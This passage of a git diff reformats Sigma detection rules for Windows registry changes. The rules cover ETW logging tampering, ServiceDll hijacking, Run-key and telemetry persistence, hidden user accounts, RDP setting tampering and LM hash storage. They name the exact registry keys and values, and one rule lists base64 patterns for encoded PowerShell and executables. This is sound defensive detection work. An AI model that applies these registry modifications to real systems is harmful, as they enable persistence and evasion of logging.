"ExtErrorInformation" key in order to disable - ETW logging for rpcrt4.dll +description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) @@ -23,8 +22,9 @@ detection: selection: TargetObject|endswith: \Microsoft\Windows NT\Rpc\ExtErrorInformation Details: - - DWORD (0x00000000) - - DWORD (0x00000002) + # This is disabled by default for some reason + - DWORD (0x00000000) # Off + - DWORD (0x00000002) # Off with exceptions condition: registry_set and selection falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml b/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml index e3b53d82a..5e850dda7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml @@ -1,8 +1,7 @@ title: ScreenSaver Registry Key Set id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce status: experimental -description: Detects registry key established after masqueraded .scr file execution - using Rundll32 through desk.cpl +description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl references: - https://twitter.com/VakninHai/status/1517027824984547329 - https://twitter.com/pabraeken/status/998627081360695297 diff --git a/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml b/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml index d84a79aa9..ff4ebad09 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml @@ -1,8 +1,7 @@ title: ServiceDll Hijack id: 612e47e9-8a59-43a6-b404-f48683f45bd6 status: experimental -description: Detects changes to the "ServiceDLL" value related to a service in the - registry. This is often used as a method of persistence. +description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml index 2700cfd85..f541d98e0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For SCM id: 4f281b83-0200-4b34-bf35-d24687ea57c2 status: experimental -description: Detects changes to the "TracingDisabled" key in order to disable ETW - logging for services.exe (SCM) +description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|endswith: Software\Microsoft\Windows NT\CurrentVersion\Tracing\SCM\Regular\TracingDisabled - Details: DWORD (0x00000001) + Details: DWORD (0x00000001) # Funny (sad) enough, this value is by default 1. condition: registry_set and selection falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml b/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml index b2294fe45..20beca79c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml @@ -1,8 +1,7 @@ title: Registry Explorer Policy Modification id: 1c3121ed-041b-4d97-a075-07f54f20fb4a status: test -description: Detects registry modifications that disable internal tools or functions - in explorer (malware like Agent Tesla uses this technique) +description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml index f9dccbe0a..2556e07da 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via New SIP Provider id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/codesigning.html - https://github.com/gtworek/PSBits/tree/master/SIP @@ -34,6 +33,7 @@ detection: - \$DLL filter: Details: + # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll filter_poqexec: diff --git a/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml index 9e99d1674..037e12023 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml @@ -26,7 +26,6 @@ detection: Details: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some FP may occur when the feature is disabled by the AV itself, you should - always investigate if the action was legitimate + - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml b/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml index a937d23f8..5e223457d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml @@ -1,12 +1,10 @@ title: Hiding User Account Via SpecialAccounts Registry Key id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd related: - - id: 8a58209c-7ae6-4027-afb0-307a78e4589a - type: obsoletes + - id: 8a58209c-7ae6-4027-afb0-307a78e4589a + type: obsoletes status: test -description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to - "0" in order to hide user account from being listed on the logon screen. +description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md @@ -25,7 +23,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Details: DWORD (0x00000000) condition: registry_set and selection diff --git a/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml b/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml index 6c0457709..b49042676 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml @@ -1,8 +1,7 @@ title: Activate Suppression of Windows Security Center Notifications id: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 status: experimental -description: Detect set Notification_Suppress to 1 to disable the Windows security - center notification +description: Detect set Notification_Suppress to 1 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml index 744fd55fd..f321d76b6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml @@ -1,9 +1,7 @@ title: Suspicious Keyboard Layout Load id: 34aa0252-6039-40ff-951f-939fd6ce47d8 status: test -description: Detects the keyboard preload installation with a suspicious keyboard - layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems - maintained by US staff only +description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only references: - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files @@ -17,8 +15,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload - subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' + definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' detection: registry_set: EventID: 13 @@ -28,12 +25,11 @@ detection: - \Keyboard Layout\Preload\ - \Keyboard Layout\Substitutes\ Details|contains: - - 00000429 - - 00050429 - - 0000042a + - 00000429 # Persian (Iran) + - 00050429 # Persian (Iran) + - 0000042a # Vietnamese condition: registry_set and selection_registry falsepositives: - - Administrators or users that actually use the selected keyboard layouts (heavily - depends on the organisation's user base) + - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml index 5029cc3c5..6cc7dbd26 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml @@ -1,9 +1,7 @@ title: Potential PendingFileRenameOperations Tamper id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a status: test -description: Detect changes to the "PendingFileRenameOperations" registry key from - uncommon or suspicious images lcoations to stage currently used files for rename - after reboot. +description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot. references: - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6 - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/ @@ -24,7 +22,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - EventType: SetValue + EventType: SetValue TargetObject|contains: \CurrentControlSet\Control\Session Manager\PendingFileRenameOperations selection_susp_paths: Image|contains: diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml index 8eefa93ae..300366432 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml @@ -1,8 +1,7 @@ title: Suspicious Printer Driver Empty Manufacturer id: e0813366-0407-449a-9869-a2db1119dc41 status: test -description: Detects a suspicious printer driver installation with an empty Manufacturer - value +description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 author: Florian Roth (Nextron Systems) @@ -35,7 +34,6 @@ detection: TargetObject|contains: \Version-3\PDF24\ condition: registry_set and (selection and not 1 of filter_*) falsepositives: - - Alerts on legitimate printer drivers that do not set any more details in the - Manufacturer value + - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml index 19bee4c54..7fbe21945 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Explorer Run Key id: b7916c2a-fa2f-4795-9477-32b731f70f11 status: test -description: Detects a possible persistence mechanism using RUN key for Windows Explorer - and pointing to a suspicious folder +description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder references: - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ author: Florian Roth (Nextron Systems), oscd.community diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml index 2a1fc6e13..51b3e44c0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -1,8 +1,7 @@ title: New RUN Key Pointing to Suspicious Folder id: 02ee49e2-e294-4d0f-9278-f5b3212fc588 status: experimental -description: Detects suspicious new RUN key element pointing to an executable in a - suspicious folder +description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing @@ -24,20 +23,20 @@ detection: - \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ - \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ selection_details: - - Details|contains: - - :\$Recycle.bin\ - - :\Temp\ - - :\Users\Default\ - - :\Users\Desktop\ - - :\Users\Public\ - - :\Windows\Temp\ - - \AppData\Local\Temp\ - - '%temp%\' - - '%tmp%\' - - Details|startswith: - - '%Public%\' - - wscript - - cscript + - Details|contains: + - :\$Recycle.bin\ + - :\Temp\ + - :\Users\Default\ + - :\Users\Desktop\ + - :\Users\Public\ + - :\Windows\Temp\ + - \AppData\Local\Temp\ + - '%temp%\' + - '%tmp%\' + - Details|startswith: + - '%Public%\' + - wscript + - cscript condition: registry_set and (all of selection_*) fields: - Image diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml index 3748e354b..98e00a796 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml @@ -1,13 +1,9 @@ title: Suspicious Service Installed id: f2485272-a156-4773-82d7-1d178bc4905b status: test -description: 'Detects installation of NalDrv or PROCEXP152 services via registry-keys - to non-system32 folders. - - Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), - which uses KDU (https://github.com/hfiref0x/KDU) - - ' +description: | + Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. + Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) references: - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ author: xknow (@xknow_infosec), xorxes (@xor_xes) @@ -30,6 +26,7 @@ detection: - HKLM\System\CurrentControlSet\Services\PROCEXP152\ImagePath filter: Image|endswith: + # Please add the full paths that you use in your environment to tighten the rule - \procexp64.exe - \procexp.exe - \procmon64.exe @@ -39,8 +36,6 @@ detection: Details|contains: \WINDOWS\system32\Drivers\PROCEXP152.SYS condition: registry_set and (selection and not filter) falsepositives: - - Other legimate tools using this service names and drivers. Note - clever attackers - may easily bypass this detection by just renaming the services. Therefore - just Medium-level and don't rely on it. + - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml index b185dc86d..e3dab9f31 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml @@ -1,8 +1,7 @@ title: Modify User Shell Folders Startup Value id: 9c226817-8dc9-46c2-a58d-66655aafd7dc status: experimental -description: Detect modification of the startup key to a path where a payload could - be stored to be launched during startup +description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup references: - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md author: frack113 @@ -21,9 +20,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User - Shell Folders - TargetObject|endswith: Startup + TargetObject|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + TargetObject|endswith: Startup # cover Common Startup and Startup + # can use Details|contains: path if get too many FP condition: registry_set and selection falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml b/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml index c4f24ab37..ac37bd337 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml @@ -1,8 +1,7 @@ title: Suspicious Environment Variable Has Been Registered id: 966315ef-c5e1-4767-ba25-fce9c8de3660 status: test -description: Detects the creation of user-specific or system-wide environment variables - via the registry. Which contains suspicious commands and strings +description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings references: - https://infosec.exchange/@sbousseaden/109542254124022664 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,39 +21,43 @@ detection: selection_main: TargetObject|contains: \Environment\ selection_details: - - Details: - - powershell - - pwsh - - Details|contains: - - \AppData\Local\Temp\ - - C:\Users\Public\ - - TVqQAAMAAAAEAAAA - - TVpQAAIAAAAEAA8A - - TVqAAAEAAAAEABAA - - TVoAAAAAAAAAAAAA - - TVpTAQEAAAAEAAAA - - SW52b2tlL - - ludm9rZS - - JbnZva2Ut - - SQBuAHYAbwBrAGUALQ - - kAbgB2AG8AawBlAC0A - - JAG4AdgBvAGsAZQAtA - - Details|startswith: - - SUVY - - SQBFAF - - SQBuAH - - cwBhA - - aWV4 - - aQBlA - - R2V0 - - dmFy - - dgBhA - - dXNpbm - - H4sIA - - Y21k - - cABhAH - - Qzpc - - Yzpc + - Details: + - powershell + - pwsh + - Details|contains: + # Add more suspicious strings in env variables below + - \AppData\Local\Temp\ + - C:\Users\Public\ + # Base64 MZ Header + - TVqQAAMAAAAEAAAA # MZ.......... + - TVpQAAIAAAAEAA8A + - TVqAAAEAAAAEABAA + - TVoAAAAAAAAAAAAA + - TVpTAQEAAAAEAAAA + # Base64 Invoke- (UTF-8) + - SW52b2tlL + - ludm9rZS + - JbnZva2Ut + # Base64 Invoke- (UTF-16LE) + - SQBuAHYAbwBrAGUALQ + - kAbgB2AG8AawBlAC0A + - JAG4AdgBvAGsAZQAtA + - Details|startswith: # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 + - SUVY + - SQBFAF + - SQBuAH + - cwBhA + - aWV4 + - aQBlA + - R2V0 + - dmFy + - dgBhA + - dXNpbm + - H4sIA + - Y21k + - cABhAH + - Qzpc + - Yzpc condition: registry_set and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml b/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml index c17144392..8560ae7eb 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml @@ -1,16 +1,12 @@ title: Enable LM Hash Storage id: c420410f-c2d8-4010-856b-dffe21866437 related: - - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 - type: similar + - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation + type: similar status: experimental -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password diff --git a/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml b/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml index 51ae0e6d0..79250d539 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml @@ -1,8 +1,7 @@ title: Scheduled TaskCache Change by Uncommon Program id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d status: experimental -description: Monitor the creation of a new key under 'TaskCache' when a new scheduled - task is registered by a process that is not svchost.exe, which is suspicious +description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -34,12 +33,11 @@ detection: filter_svchost: Image: C:\WINDOWS\system32\svchost.exe filter_ngen: - Image|startswith: C:\Windows\Microsoft.NET\Framework + Image|startswith: C:\Windows\Microsoft.NET\Framework # \Framework\ and \Framework64\ Image|endswith: \ngen.exe TargetObject|contains: - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129} - - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET - Framework\.NET Framework NGEN + - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN filter_office_click_to_run: Image: - C:\Program Files\Microsoft Office\root\Integration\Integrator.exe @@ -52,8 +50,7 @@ detection: - C:\Program Files\Dropbox\Update\DropboxUpdate.exe filter_explorer: Image: C:\Windows\explorer.exe - TargetObject|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server - Manager Performance Monitor\ + TargetObject|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server Manager Performance Monitor\ filter_system: Image: System condition: registry_set and (selection and not 1 of filter*) diff --git a/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml index 5d2e4715f..d07cf32ca 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml @@ -1,22 +1,14 @@ title: Potential Registry Persistence Attempt Via Windows Telemetry id: 73a883d0-0348-4be4-a8d8-51031c2564f8 related: - - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 - type: obsoletes + - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 + type: obsoletes status: test -description: 'Detects potential persistence behavior using the windows telemetry registry - key. - - Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety - of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Detects potential persistence behavior using the windows telemetry registry key. + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Lednyov Alexey, oscd.community, Sreeman @@ -29,8 +21,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows - NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' + definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' detection: registry_set: EventID: 13 diff --git a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml index 46e776be5..7b649d2a5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml @@ -1,25 +1,21 @@ title: RDP Sensitive Settings Changed to Zero id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b related: - - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c - type: similar + - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections'', etc. - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/09/29 modified: 2022/11/26 tags: @@ -36,13 +32,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|endswith: - - \fDenyTSConnections - - \fSingleSessionPerUser - - \UserAuthentication + - \fDenyTSConnections # Specifies whether Remote Desktop connections are enabled - When set to zero RDP is enabled + - \fSingleSessionPerUser # When changed to 0 it allows multiple RDP sessions + - \UserAuthentication # Specifies that Network-Level user authentication is not required before the remote desktop connection is established Details: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml index e657080af..9929f2939 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml @@ -1,29 +1,25 @@ title: RDP Sensitive Settings Changed id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c related: - - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 - type: obsoletes - - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 - type: obsoletes - - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b - type: similar + - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 + type: obsoletes + - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 + type: obsoletes + - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections''...etc - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - 